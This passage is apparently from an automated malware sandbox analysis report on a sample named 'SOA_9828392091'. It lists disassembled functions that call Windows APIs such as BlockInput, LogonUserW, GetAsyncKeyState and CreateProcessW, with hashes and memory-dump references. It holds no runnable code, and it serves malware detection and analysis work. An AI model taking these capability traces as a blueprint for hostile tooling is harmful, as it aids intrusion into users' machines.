                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$CallLongProc
                                      • String ID:
                                      • API String ID: 4084987330-0
                                      • Opcode ID: f79dba930dfeabb2560ebe46e84291f303308b85166c2643678cc9fb6ffd8102
                                      • Instruction ID: d4aa4e3ca131a2ce5edbc26b3ca862ec3198b3f7a843d8102fb5be809badb957
                                      • Opcode Fuzzy Hash: f79dba930dfeabb2560ebe46e84291f303308b85166c2643678cc9fb6ffd8102
                                      • Instruction Fuzzy Hash: 39F03735104108EFCF15DF98EC00DB93BAAEB48320B048514FA159B2A1CB72ECA0EB90
                                      Function 0099EC7C Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                        • Part of subcall function 0094B63C: GetCursorPos.USER32(000000FF), ref: 0094B64F
                                        • Part of subcall function 0094B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0094B66C
                                        • Part of subcall function 0094B63C: GetAsyncKeyState.USER32(00000001), ref: 0094B691
                                        • Part of subcall function 0094B63C: GetAsyncKeyState.USER32(00000002), ref: 0094B69F
                                      • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,009AE514,?,?,?,?,?,00000001,?), ref: 0099ECCA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                      • String ID:
                                      • API String ID: 2356834413-0
                                      • Opcode ID: c8c649c25218aaa6257f20a05e573a0a04f5337576beb80967f2a5c07f2b8ef2
                                      • Instruction ID: 10095027518c5c322a4dfd04be9233e0800afa279aa3257f8b7831b0aa801ca3
                                      • Opcode Fuzzy Hash: c8c649c25218aaa6257f20a05e573a0a04f5337576beb80967f2a5c07f2b8ef2
                                      • Instruction Fuzzy Hash: 34F0EC30200228EBDF149F09DC06EBE3B55EF00760F004415F9451A2D1D7769C70EBD0
                                      Function 0094AAFC Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 0094AB45
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: a09d4e0cf2115a202c1583122c546e709c907f16e877a84da7547340e80bc8e8
                                      • Instruction ID: 6c9b9b98453a53dd3fa046d85e4b5baec8b915365df0f14d5177f6a746ea9957
                                      • Opcode Fuzzy Hash: a09d4e0cf2115a202c1583122c546e709c907f16e877a84da7547340e80bc8e8
                                      • Instruction Fuzzy Hash: 35F08C30614209DFDF289F09EC19E393BA6FB44360F04421AF9128B2A0E772D860EB90
                                      Function 00986AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 00986ACA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      • Opcode ID: 7e6ec6668c0b77762cd4c18a3e56030dcbbc946d09153c86d212804df20c09e8
                                      • Instruction ID: 4ef5e3bb5732bef13f4c60b5a303984b1bc46f1625b0660d40ef133de84cbc2f
                                      • Opcode Fuzzy Hash: 7e6ec6668c0b77762cd4c18a3e56030dcbbc946d09153c86d212804df20c09e8
                                      • Instruction Fuzzy Hash: 6CE04835210204AFC700EF59D404E56B7ECAFB4751F04C456F945DB351DAB4F8048BA0
                                      Function 009774BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009774DE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: mouse_event
                                      • String ID:
                                      • API String ID: 2434400541-0
                                      • Opcode ID: d9d2fef0e3fb52489f0f596747a90fa76998d2fe073863647098165878b2fdf5
                                      • Instruction ID: 97db2fba5a4c336231417a1c588ae795e29d3f8e390d556515d30047872be211
                                      • Opcode Fuzzy Hash: d9d2fef0e3fb52489f0f596747a90fa76998d2fe073863647098165878b2fdf5
                                      • Instruction Fuzzy Hash: 97D05EA312C70538EC3807A48C0FF76890EF3007C4F80D6C9B28AC90E1B8C45801A032
                                      Function 0099F609 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0099F649
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogNtdllProc_
                                      • String ID:
                                      • API String ID: 3239928679-0
                                      • Opcode ID: 44fb98c9ff14617a40fa47bebb099b85b5953c303e23528a0b8cf43e615b6dd7
                                      • Instruction ID: 148531798e4a2d235f2d0158e06592eefdf82b5f2201c0f244e72f1162ed45cc
                                      • Opcode Fuzzy Hash: 44fb98c9ff14617a40fa47bebb099b85b5953c303e23528a0b8cf43e615b6dd7
                                      • Instruction Fuzzy Hash: 69F06D31205389AFDF21EF58DC15FD67B99EB16720F144009BA11672E1CBB07820EBA0
                                      Function 0094AB4F Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0094AB7D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: 61a1dfd3d3ee9dd27dc6e56c86bd9ae54f9c1145e3f8fb750b66c0f5fd06f5a5
                                      • Instruction ID: 536af39d2c54500f6edb48c86423e973a7931d4ab0292f57feeaa4a367f3efdb
                                      • Opcode Fuzzy Hash: 61a1dfd3d3ee9dd27dc6e56c86bd9ae54f9c1145e3f8fb750b66c0f5fd06f5a5
                                      • Instruction Fuzzy Hash: 4EE01235645308FBCF25AF91DC11F683B2AEF88324F104058F6054B2A1CB73A522EB50
                                      Function 0096B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      APIs
                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0096AD3E), ref: 0096B124
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LogonUser
                                      • String ID:
                                      • API String ID: 1244722697-0
                                      • Opcode ID: bba930517657330b89276801f28906bbc36312c0ac93d0c608ca0728ea7333da
                                      • Instruction ID: ad62024a9d114a0f32e455b9e5c2738b5bf624f462f8e7c474e2b516fa9501b0
                                      • Opcode Fuzzy Hash: bba930517657330b89276801f28906bbc36312c0ac93d0c608ca0728ea7333da
                                      • Instruction Fuzzy Hash: A7D05E320A460EAEDF025FA4DC02EAE3F6AEB04700F408110FA11C50A0C671D531AB50
                                      Function 0099F654 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,009AE4D1,?,?,?,?,?,?), ref: 0099F67F
                                        • Part of subcall function 0099E32E: _memset.LIBCMT ref: 0099E33D
                                        • Part of subcall function 0099E32E: _memset.LIBCMT ref: 0099E34C
                                        • Part of subcall function 0099E32E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009F3D00,009F3D44), ref: 0099E37B
                                        • Part of subcall function 0099E32E: CloseHandle.KERNEL32 ref: 0099E38D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                      • String ID:
                                      • API String ID: 2364484715-0
                                      • Opcode ID: 1c540426a93a072787839dbed4f6769c71134ab33bf78d9ff8dd0548d9af05f0
                                      • Instruction ID: 8f79604027b4325f457761cbadf32329e70deb8fd9fb108e44d713e366770f19
                                      • Opcode Fuzzy Hash: 1c540426a93a072787839dbed4f6769c71134ab33bf78d9ff8dd0548d9af05f0
                                      • Instruction Fuzzy Hash: DCE04632114209DFCF01DF08DD15E9937B9EB08328F014115FA00872B1C731AC60EF40
                                      Function 0099F5AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtdllDialogWndProc_W.NTDLL ref: 0099F5D0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogNtdllProc_
                                      • String ID:
                                      • API String ID: 3239928679-0
                                      • Opcode ID: fc9bf19b5da4b4142f81aa3252b9a4158b03035c64bc56f720e09ff4454fde7e
                                      • Instruction ID: 180d42d0a017eb154fb146bc20f7e8241442c7b352c63c8641c03cc140a0a41d
                                      • Opcode Fuzzy Hash: fc9bf19b5da4b4142f81aa3252b9a4158b03035c64bc56f720e09ff4454fde7e
                                      • Instruction Fuzzy Hash: A1E0173420820DEFCB01DF84DC44E963BA5EB19324F010054FD048B361D771A830EBA1
                                      Function 0099F5DA Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtdllDialogWndProc_W.NTDLL ref: 0099F5FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogNtdllProc_
                                      • String ID:
                                      • API String ID: 3239928679-0
                                      • Opcode ID: 9c1dfe11565a1928301b2382b4970a96085fe8e8ecdc522fa310f8bfbbcdbf7c
                                      • Instruction ID: 807cdeab1b4bed285030285a74fa8b1fd6dbdea7681abb5ea8f1f9475526d406
                                      • Opcode Fuzzy Hash: 9c1dfe11565a1928301b2382b4970a96085fe8e8ecdc522fa310f8bfbbcdbf7c
                                      • Instruction Fuzzy Hash: 6AE0173420420DEFCB01DF84DC44E963BA5FB19324F010054FD048B362C772A870EBA1
                                      Function 0094B715 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                        • Part of subcall function 0094B73E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0094B72B), ref: 0094B7F6
                                        • Part of subcall function 0094B73E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0094B72B,00000000,?,?,0094B2EF,?,?), ref: 0094B88D
                                      • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0094B2EF,?,?), ref: 0094B734
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                      • String ID:
                                      • API String ID: 2797419724-0
                                      • Opcode ID: 803b280eacf241751038db19e9eb429cdb16e9a4768996592339fa5d923f3756
                                      • Instruction ID: 9d8eababec930926fdc747384d8fba9de06759fcba3911f2f7d7c5edbb3ffc3e
                                      • Opcode Fuzzy Hash: 803b280eacf241751038db19e9eb429cdb16e9a4768996592339fa5d923f3756
                                      • Instruction Fuzzy Hash: 30D0123014530CB7DF202F51DE07F593A5E9B90750F004410B704691D1CBB1A51096A4
                                      Function 009AB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      • Opcode ID: cf032de00ac7ae97890d2804c3786e368262e23b907e11c52ee42148f61a4424
                                      • Instruction ID: 26d7bfb8cbba76c3c39a9fde7d1fd59a41e14f0a44c71c642d4ca2d4d8f6805c
                                      • Opcode Fuzzy Hash: cf032de00ac7ae97890d2804c3786e368262e23b907e11c52ee42148f61a4424
                                      • Instruction Fuzzy Hash: 70C04CB1405109DFD751DFC0CA449EEB7BCAB05311F104191A145F1110D7749B459B72
                                      Function 00958189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0095818F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 609c6767f468fbec80ad035a90c78a230977e95634e7b712bb084c26d30b738e
                                      • Instruction ID: 4317bc574bd72cdecbb4f6f0a91544d73793eac304064be348716ed8465b56f2
                                      • Opcode Fuzzy Hash: 609c6767f468fbec80ad035a90c78a230977e95634e7b712bb084c26d30b738e
                                      • Instruction Fuzzy Hash: E3A0113000820CAB8F002B82EC088883FACEA002A8B000020F80C00022AB23AA20AA82
                                      Function 0093E3B0 Relevance: .5, Instructions: 540COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0faf3a9620d6860ccc55eafd0d894656a2431a2c2b9a5c333676a7cea1ceebf4
                                      • Instruction ID: 82e669404e4ebfb25179e2b8f8c6055bff423b5b7da91822eddbed06b9c7d5ad
                                      • Opcode Fuzzy Hash: 0faf3a9620d6860ccc55eafd0d894656a2431a2c2b9a5c333676a7cea1ceebf4
                                      • Instruction Fuzzy Hash: 7E22CB70E0420ADFDB24DF58C491BAAB7B4FF58304F148469E98A9B391E735AD81CF91
                                      Function 009393F0 Relevance: .5, Instructions: 531COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 585e2bc2f80b4fc421458f2e87f3073bc38b19b22f5526cad403abbd84c94035
                                      • Instruction ID: e52348e8738c98075972768fa52bee9ee5514b1d9651ac80899ebbfccdeceb1f
                                      • Opcode Fuzzy Hash: 585e2bc2f80b4fc421458f2e87f3073bc38b19b22f5526cad403abbd84c94035
                                      • Instruction Fuzzy Hash: 9E126C70A00609EFDF04DFA9D995AAEB7F9FF88300F108569E806E7250EB75AD10CB50
                                      Function 0093AF50 Relevance: .5, Instructions: 514COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
